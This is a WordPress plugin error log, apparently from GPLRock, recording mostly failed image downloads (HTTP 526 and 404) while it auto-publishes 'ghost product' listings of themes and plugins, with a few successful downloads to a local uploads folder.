22:33:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fundboxs-charity-donation-wordpress-theme [04-Apr-2026 22:33:02 UTC] GPLRock: Image download failed for product tripay-travel-tour-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:04 UTC] GPLRock: Image download failed for product tripay-travel-tour-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tripay---travel--tour-booking-wordpress-theme-21095.webp for product tripay-travel-tour-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:33:07 UTC] GPLRock: Image download failed for product tripay-travel-tour-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:09 UTC] GPLRock: Image download failed for product tripay-travel-tour-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tripay---travel--tour-booking-wordpress-theme-21095.webp for product tripay-travel-tour-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:33:11 UTC] GPLRock WARNING: Image download failed for product tripay-travel-tour-booking-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tripay---travel--tour-booking-wordpress-theme-21095.webp [04-Apr-2026 22:33:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tripay-travel-tour-booking-wordpress-theme [04-Apr-2026 22:33:11 UTC] GPLRock: Image download failed for product search-go-directory-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:13 UTC] GPLRock: Image download failed for product search-go-directory-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/search--go---directory-wordpress-theme-2710.webp for product search-go-directory-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:33:15 UTC] GPLRock: Image download failed for product search-go-directory-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:17 UTC] GPLRock: Image download failed for product search-go-directory-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/search--go---directory-wordpress-theme-2710.webp for product search-go-directory-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:33:20 UTC] GPLRock WARNING: Image download failed for product search-go-directory-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/search--go---directory-wordpress-theme-2710.webp [04-Apr-2026 22:33:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: search-go-directory-wordpress-theme [04-Apr-2026 22:33:20 UTC] GPLRock: Image download failed for product royale-creative-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:22 UTC] GPLRock: Image download failed for product royale-creative-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/royale---creative-wordpress-theme-25225.webp for product royale-creative-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:33:24 UTC] GPLRock: Image download failed for product royale-creative-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:26 UTC] GPLRock: Image download failed for product royale-creative-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/royale---creative-wordpress-theme-25225.webp for product royale-creative-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:33:28 UTC] GPLRock WARNING: Image download failed for product royale-creative-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/royale---creative-wordpress-theme-25225.webp [04-Apr-2026 22:33:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: royale-creative-wordpress-theme [04-Apr-2026 22:33:28 UTC] GPLRock: Image download failed for product volare-trekking-sailing-diving-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:30 UTC] GPLRock: Image download failed for product volare-trekking-sailing-diving-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/volare---trekking-sailing-diving-wordpress-theme-25167.webp for product volare-trekking-sailing-diving-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:33:33 UTC] GPLRock: Image download failed for product volare-trekking-sailing-diving-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:35 UTC] GPLRock: Image download failed for product volare-trekking-sailing-diving-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/volare---trekking-sailing-diving-wordpress-theme-25167.webp for product volare-trekking-sailing-diving-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:33:37 UTC] GPLRock WARNING: Image download failed for product volare-trekking-sailing-diving-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/volare---trekking-sailing-diving-wordpress-theme-25167.webp [04-Apr-2026 22:33:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: volare-trekking-sailing-diving-wordpress-theme [04-Apr-2026 22:33:37 UTC] GPLRock: Image download failed for product autostar-car-rental-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:39 UTC] GPLRock: Image download failed for product autostar-car-rental-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autostar---car-rental-wordpress-theme-27780.webp for product autostar-car-rental-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:33:41 UTC] GPLRock: Image download failed for product autostar-car-rental-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:43 UTC] GPLRock: Image download failed for product autostar-car-rental-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autostar---car-rental-wordpress-theme-27780.webp for product autostar-car-rental-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:33:46 UTC] GPLRock WARNING: Image download failed for product autostar-car-rental-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/autostar---car-rental-wordpress-theme-27780.webp [04-Apr-2026 22:33:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: autostar-car-rental-wordpress-theme [04-Apr-2026 22:33:46 UTC] GPLRock: Image downloaded successfully for product we-build-construction-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-33c62f21.webp [04-Apr-2026 22:33:46 UTC] GPLRock: Using pre-downloaded image for product we-build-construction-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-33c62f21.webp [04-Apr-2026 22:33:46 UTC] GPLRock: Ghost product published with image - Product ID: we-build-construction-wordpress-theme [04-Apr-2026 22:33:46 UTC] GPLRock: Image download failed for product hair-care-responsive-salon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:48 UTC] GPLRock: Image download failed for product hair-care-responsive-salon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hair-care---responsive-salon-wordpress-theme-20385.webp for product hair-care-responsive-salon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:33:50 UTC] GPLRock: Image download failed for product hair-care-responsive-salon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:52 UTC] GPLRock: Image download failed for product hair-care-responsive-salon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hair-care---responsive-salon-wordpress-theme-20385.webp for product hair-care-responsive-salon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:33:54 UTC] GPLRock WARNING: Image download failed for product hair-care-responsive-salon-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/hair-care---responsive-salon-wordpress-theme-20385.webp [04-Apr-2026 22:33:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hair-care-responsive-salon-wordpress-theme [04-Apr-2026 22:33:55 UTC] GPLRock: Image download failed for product gearnix-gaming-gear-accessories-tailwind-css-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:57 UTC] GPLRock: Image download failed for product gearnix-gaming-gear-accessories-tailwind-css-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:33:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gearnix---gaming-gear--accessories-tailwind-css-woocommerce-theme-240.webp for product gearnix-gaming-gear-accessories-tailwind-css-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:33:59 UTC] GPLRock: Image download failed for product gearnix-gaming-gear-accessories-tailwind-css-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:34:01 UTC] GPLRock: Image download failed for product gearnix-gaming-gear-accessories-tailwind-css-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:34:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gearnix---gaming-gear--accessories-tailwind-css-woocommerce-theme-240.webp for product gearnix-gaming-gear-accessories-tailwind-css-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:34:03 UTC] GPLRock WARNING: Image download failed for product gearnix-gaming-gear-accessories-tailwind-css-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/gearnix---gaming-gear--accessories-tailwind-css-woocommerce-theme-240.webp [04-Apr-2026 22:34:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gearnix-gaming-gear-accessories-tailwind-css-woocommerce-theme [04-Apr-2026 22:35:41 UTC] GPLRock: Image download failed for product keymoto-motorcycle-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:35:43 UTC] GPLRock: Image download failed for product keymoto-motorcycle-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:35:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/keymoto---motorcycle-wordpress-theme-24263.webp for product keymoto-motorcycle-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:35:46 UTC] GPLRock: Image download failed for product keymoto-motorcycle-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:35:48 UTC] GPLRock: Image download failed for product keymoto-motorcycle-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:35:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/keymoto---motorcycle-wordpress-theme-24263.webp for product keymoto-motorcycle-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:35:50 UTC] GPLRock WARNING: Image download failed for product keymoto-motorcycle-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/keymoto---motorcycle-wordpress-theme-24263.webp [04-Apr-2026 22:35:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: keymoto-motorcycle-wordpress-theme [04-Apr-2026 22:35:50 UTC] GPLRock: Image download failed for product miniport-minimal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:35:52 UTC] GPLRock: Image download failed for product miniport-minimal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:35:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/miniport---minimal-portfolio-wordpress-theme-13796.webp for product miniport-minimal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:35:54 UTC] GPLRock: Image download failed for product miniport-minimal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:35:56 UTC] GPLRock: Image download failed for product miniport-minimal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:35:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/miniport---minimal-portfolio-wordpress-theme-13796.webp for product miniport-minimal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:35:58 UTC] GPLRock WARNING: Image download failed for product miniport-minimal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/miniport---minimal-portfolio-wordpress-theme-13796.webp [04-Apr-2026 22:35:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: miniport-minimal-portfolio-wordpress-theme [04-Apr-2026 22:35:59 UTC] GPLRock: Image download failed for product baker-fresh-bakery-pastry-and-cake-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:36:01 UTC] GPLRock: Image download failed for product baker-fresh-bakery-pastry-and-cake-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:45:44 UTC] GPLRock: Image downloaded successfully for product homeland-responsive-real-estate-theme-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4cd89b52.jpg [04-Apr-2026 22:45:44 UTC] GPLRock: Using pre-downloaded image for product homeland-responsive-real-estate-theme-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4cd89b52.jpg [04-Apr-2026 22:45:44 UTC] GPLRock: Ghost product published with image - Product ID: homeland-responsive-real-estate-theme-for-wordpress [04-Apr-2026 22:45:46 UTC] GPLRock: Image downloaded successfully for product business-finder-directory-listing-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dc269023.jpg [04-Apr-2026 22:45:46 UTC] GPLRock: Using pre-downloaded image for product business-finder-directory-listing-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dc269023.jpg [04-Apr-2026 22:45:46 UTC] GPLRock: Ghost product published with image - Product ID: business-finder-directory-listing-wordpress-theme [04-Apr-2026 22:45:48 UTC] GPLRock: Image downloaded successfully for product wp-rich-snippets-box-shortcode (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-05f66a4c.jpg [04-Apr-2026 22:45:48 UTC] GPLRock: Using pre-downloaded image for product wp-rich-snippets-box-shortcode: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-05f66a4c.jpg [04-Apr-2026 22:45:48 UTC] GPLRock: Ghost product published with image - Product ID: wp-rich-snippets-box-shortcode [04-Apr-2026 22:45:49 UTC] GPLRock: Image downloaded successfully for product array-themes-camera-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-72a61af2.jpg [04-Apr-2026 22:45:49 UTC] GPLRock: Using pre-downloaded image for product array-themes-camera-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-72a61af2.jpg [04-Apr-2026 22:45:49 UTC] GPLRock: Ghost product published with image - Product ID: array-themes-camera-wordpress-theme [04-Apr-2026 22:45:51 UTC] GPLRock: Image downloaded successfully for product mythemeshop-thunderstruck-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0be0be3b.jpg [04-Apr-2026 22:45:51 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-thunderstruck-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0be0be3b.jpg [04-Apr-2026 22:45:51 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-thunderstruck-wordpress-theme [04-Apr-2026 22:45:53 UTC] GPLRock: Image downloaded successfully for product envira-gallery-nextgen-importer-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e8c4d85b.jpg [04-Apr-2026 22:45:53 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-nextgen-importer-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e8c4d85b.jpg [04-Apr-2026 22:45:53 UTC] GPLRock: Ghost product published with image - Product ID: envira-gallery-nextgen-importer-addon [04-Apr-2026 22:45:54 UTC] GPLRock: Image downloaded successfully for product searchwp-related-content (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9a1508e9.jpg [04-Apr-2026 22:45:54 UTC] GPLRock: Using pre-downloaded image for product searchwp-related-content: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9a1508e9.jpg [04-Apr-2026 22:45:54 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-related-content [04-Apr-2026 22:45:56 UTC] GPLRock: Image downloaded successfully for product css-igniter-vidiho-pro-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-75f819b2.jpg [04-Apr-2026 22:45:56 UTC] GPLRock: Using pre-downloaded image for product css-igniter-vidiho-pro-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-75f819b2.jpg [04-Apr-2026 22:45:56 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-vidiho-pro-theme [04-Apr-2026 22:45:59 UTC] GPLRock: Image download failed for product woocommerce-amazon-s3-storage (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 22:46:03 UTC] GPLRock: Image download failed for product woocommerce-amazon-s3-storage (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 22:46:08 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/09/WooCommerce-Amazon-S3-Storage.jpg for product woocommerce-amazon-s3-storage after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 22:46:10 UTC] GPLRock: Image download failed for product woocommerce-amazon-s3-storage (attempt 1/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 22:46:14 UTC] GPLRock: Image download failed for product woocommerce-amazon-s3-storage (attempt 2/3). HTTP Code: 404, Error: . Retrying... [04-Apr-2026 22:46:18 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/09/WooCommerce-Amazon-S3-Storage.jpg for product woocommerce-amazon-s3-storage after 3 attempts. HTTP Code: 404, Error: [04-Apr-2026 22:46:18 UTC] GPLRock WARNING: Image download failed for product woocommerce-amazon-s3-storage. URL: https://www.gplrock.com/wp-content/uploads/2021/09/WooCommerce-Amazon-S3-Storage.jpg [04-Apr-2026 22:46:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-amazon-s3-storage [04-Apr-2026 22:46:20 UTC] GPLRock: Image downloaded successfully for product graph-paper-press-sell-media-stripe (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-893b733d.jpg [04-Apr-2026 22:46:20 UTC] GPLRock: Using pre-downloaded image for product graph-paper-press-sell-media-stripe: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-893b733d.jpg [04-Apr-2026 22:46:20 UTC] GPLRock: Ghost product published with image - Product ID: graph-paper-press-sell-media-stripe [04-Apr-2026 22:47:05 UTC] GPLRock: Image download failed for product newsource-multi-concept-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:47:07 UTC] GPLRock: Image download failed for product newsource-multi-concept-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:47:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/newsource---multi-concept-blog--magazine-wordpress-theme-12093.webp for product newsource-multi-concept-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:47:09 UTC] GPLRock: Image download failed for product newsource-multi-concept-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:47:12 UTC] GPLRock: Image download failed for product newsource-multi-concept-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:47:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/newsource---multi-concept-blog--magazine-wordpress-theme-12093.webp for product newsource-multi-concept-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:47:14 UTC] GPLRock WARNING: Image download failed for product newsource-multi-concept-blog-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/newsource---multi-concept-blog--magazine-wordpress-theme-12093.webp [04-Apr-2026 22:47:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: newsource-multi-concept-blog-magazine-wordpress-theme [04-Apr-2026 22:47:14 UTC] GPLRock: Image download failed for product mag-grid-magazine-news-wordpress-theme-front-end-submission (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:47:16 UTC] GPLRock: Image download failed for product mag-grid-magazine-news-wordpress-theme-front-end-submission (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:47:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mag--grid-magazine--news-wordpress-theme--front-end-submission-9897.webp for product mag-grid-magazine-news-wordpress-theme-front-end-submission after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:47:19 UTC] GPLRock: Image download failed for product mag-grid-magazine-news-wordpress-theme-front-end-submission (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:47:21 UTC] GPLRock: Image download failed for product mag-grid-magazine-news-wordpress-theme-front-end-submission (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:47:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mag--grid-magazine--news-wordpress-theme--front-end-submission-9897.webp for product mag-grid-magazine-news-wordpress-theme-front-end-submission after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:47:23 UTC] GPLRock WARNING: Image download failed for product mag-grid-magazine-news-wordpress-theme-front-end-submission. URL: https://meldwp.com/wp-content/uploads/mag--grid-magazine--news-wordpress-theme--front-end-submission-9897.webp [04-Apr-2026 22:47:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mag-grid-magazine-news-wordpress-theme-front-end-submission [04-Apr-2026 22:47:25 UTC] GPLRock: Image downloaded successfully for product bliggo-news-magazine-wordpress-blog-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7ec9aedf.webp [04-Apr-2026 22:47:25 UTC] GPLRock: Using pre-downloaded image for product bliggo-news-magazine-wordpress-blog-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7ec9aedf.webp [04-Apr-2026 22:57:13 UTC] GPLRock: Image download failed for product ultimate-sliders-bundle-layers-parallax-zoom (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:57:15 UTC] GPLRock: Image download failed for product ultimate-sliders-bundle-layers-parallax-zoom (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:57:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-sliders-bundle---layers-parallax-zoom-24673.webp for product ultimate-sliders-bundle-layers-parallax-zoom after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:57:18 UTC] GPLRock: Image download failed for product ultimate-sliders-bundle-layers-parallax-zoom (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:57:20 UTC] GPLRock: Image download failed for product ultimate-sliders-bundle-layers-parallax-zoom (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:57:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-sliders-bundle---layers-parallax-zoom-24673.webp for product ultimate-sliders-bundle-layers-parallax-zoom after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:57:22 UTC] GPLRock WARNING: Image download failed for product ultimate-sliders-bundle-layers-parallax-zoom. URL: https://meldwp.com/wp-content/uploads/ultimate-sliders-bundle---layers-parallax-zoom-24673.webp [04-Apr-2026 22:57:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ultimate-sliders-bundle-layers-parallax-zoom [04-Apr-2026 22:57:22 UTC] GPLRock: Image download failed for product vox-radio-online-radio-streaming (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:57:24 UTC] GPLRock: Image download failed for product vox-radio-online-radio-streaming (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:57:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vox-radio---online-radio-streaming-16876.webp for product vox-radio-online-radio-streaming after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:57:26 UTC] GPLRock: Image download failed for product vox-radio-online-radio-streaming (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:57:28 UTC] GPLRock: Image download failed for product vox-radio-online-radio-streaming (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:57:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vox-radio---online-radio-streaming-16876.webp for product vox-radio-online-radio-streaming after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:57:30 UTC] GPLRock WARNING: Image download failed for product vox-radio-online-radio-streaming. URL: https://meldwp.com/wp-content/uploads/vox-radio---online-radio-streaming-16876.webp [04-Apr-2026 22:57:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vox-radio-online-radio-streaming [04-Apr-2026 22:57:31 UTC] GPLRock: Image download failed for product wiloke-visual-card-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:57:33 UTC] GPLRock: Image download failed for product wiloke-visual-card-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:57:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wiloke-visual-card-elementor-15142.webp for product wiloke-visual-card-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:57:35 UTC] GPLRock: Image download failed for product wiloke-visual-card-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:57:37 UTC] GPLRock: Image download failed for product wiloke-visual-card-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:57:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wiloke-visual-card-elementor-15142.webp for product wiloke-visual-card-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:57:39 UTC] GPLRock WARNING: Image download failed for product wiloke-visual-card-elementor. URL: https://meldwp.com/wp-content/uploads/wiloke-visual-card-elementor-15142.webp [04-Apr-2026 22:57:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wiloke-visual-card-elementor [04-Apr-2026 22:57:39 UTC] GPLRock: Image download failed for product algori-image-and-video-slider-pro-for-wordpress-gutenberg (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:57:41 UTC] GPLRock: Image download failed for product algori-image-and-video-slider-pro-for-wordpress-gutenberg (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:57:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/algori-image-and-video-slider-pro-for-wordpress-gutenberg-23469.webp for product algori-image-and-video-slider-pro-for-wordpress-gutenberg after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:57:44 UTC] GPLRock: Image download failed for product algori-image-and-video-slider-pro-for-wordpress-gutenberg (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:57:46 UTC] GPLRock: Image download failed for product algori-image-and-video-slider-pro-for-wordpress-gutenberg (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:57:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/algori-image-and-video-slider-pro-for-wordpress-gutenberg-23469.webp for product algori-image-and-video-slider-pro-for-wordpress-gutenberg after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:57:48 UTC] GPLRock WARNING: Image download failed for product algori-image-and-video-slider-pro-for-wordpress-gutenberg. URL: 